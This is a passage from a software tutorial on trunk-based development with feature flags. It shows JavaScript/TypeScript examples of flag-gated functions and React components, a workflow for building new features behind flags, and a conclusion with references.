export function getFeatureFlag(key) {
  return featureFlags[key] || false;
}

// before
const calculateTotal = (qty, val) => {
  return qty * val;
};

// after
const calculateTotal = (qty, val, tax) => {
  if (getFeatureFlag("useNewcalculateTotal")) {
    return qty * val * tax;
  }
  return qty * val;
};

Large Modification

If the proposed feature is large, for example, we want to display a completely new TaxCalculator component, we would need to define a new code path and entry-point for that component.

featureFlags.ts

const featureFlags = {
  hellowordnewfeature: false,
  useNewcalculateTotal: true,
  useNewTaxCalculation: true
};

export function getFeatureFlag(key) {
  return featureFlags[key] || false;
}

TaxCalculator.tsx

import { getFeatureFlag } from "./featureFlags";
import { TaxCalculatorOld, TaxCalculatorNew } from "./components";

const TaxCalculator = props => {
  if (getFeatureFlag("useNewTaxCalculation")) {
    return <TaxCalculatorNew />;
  }
  return <TaxCalculatorOld />;
};

New Feature Development with Feature Flags

New feature development with feature flags is simpler than modifying existing features. Since there are no existing code paths to preserve, the new code path is simply disabled by default while the feature is WIP.

The new feature development process with flags should look like this (a minimal sketch follows the list):

  • create a feature flag for your new feature
  • begin working on your code
  • ensure your flag is false before merging into master
  • merge your code frequently
  • when the feature is ready for release, remove the flag
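A minimal sketch (hypothetical flag and function names) of a brand-new feature kept dark behind a flag until release:

import { getFeatureFlag } from "./featureFlags";

// "useNewExportFeature" stays false in featureFlags.ts until the feature is ready
export const exportReport = (rows: string[]): void => {
  if (!getFeatureFlag("useNewExportFeature")) {
    return; // feature is WIP - the new code path stays disabled in production
  }
  console.log(`Exporting ${rows.length} rows`);
};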

Conclusion

Trunk Based Development and Feature Flags together can be used for continuous delivery, bringing features to market faster. Planning them carefully will allow you to quickly deliver new business features to the system. The feature flags can also be managed through external tools like Optimizely or LaunchDarkly, which provide SDKs to manage the features externally to the applications.

References

https://cloud.google.com/solutions/devops/devops-tech-trunk-based-development

https://featureflags.io/